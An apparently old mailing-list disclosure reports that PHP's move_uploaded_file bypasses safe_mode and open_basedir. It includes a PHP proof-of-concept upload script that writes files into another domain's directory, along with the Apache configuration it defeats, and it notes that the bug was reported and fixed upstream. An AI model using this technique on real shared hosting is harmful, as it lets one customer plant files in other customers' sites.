Hey Its possible to circumvent (probadly spelled wrong) PHP safe_mode restrictions by using move_uploaded_file. You take this nasty script (and you have domain whatever.com and your directory path is /domains/whatever.com/ ) <? $file = $HTTP_POST_FILES['file']['name']; $type = $HTTP_POST_FILES['file']['type']; $size = $HTTP_POST_FILES['file']['size']; $temp = $HTTP_POST_FILES['file']['tmp_name']; $size_limit = "100000"; // set size limit in bytes if ($file){ if ($size < $size_limit){ move_uploaded_file($temp, "/domains/somebodyelse.org/public_html/www/test/".$file); echo "The file <tt>$file</tt> was sucessfully uploaded"; } else { echo "Sorry, your file exceeds the size limit of $size_limit bytes"; }} echo " <form enctype='multipart/form-data' action=$PHP_SELF method=post> Upload a file: <input name='file' type='file'> <input type='submit' value='Upload'> </form> "; ?> As you can see, he moved the uploaded file to: "/domains/somebodyelse.org/public_html/www/test/" while the user is restricted with both safe_mode and open_basedir. Virtualhost configuration snippet: <VirtualHost IP_HERE> DocumentRoot /domains/whatever.com/public_html/root/ ServerName root.whatever.com CustomLog /domains/whatever.com/logs/access_log combined ErrorLog /domains/whatever.com/logs/error_log php_admin_value safe_mode 1 php_admin_value open_basedir /domains/whatever.com/public_html/root/ </VirtualHost> As you can see I have both set safe_mode and the open_basedir restriction but this user is able to upload any file where the apache user has write access. PHP.net is notified, and the bug has been fixed in CVS. However, I am unable to compile the CVS version atm. Gives alot of 'make' errors. Thanks go out to bastijs for pointing this out to me. Bye, Tozz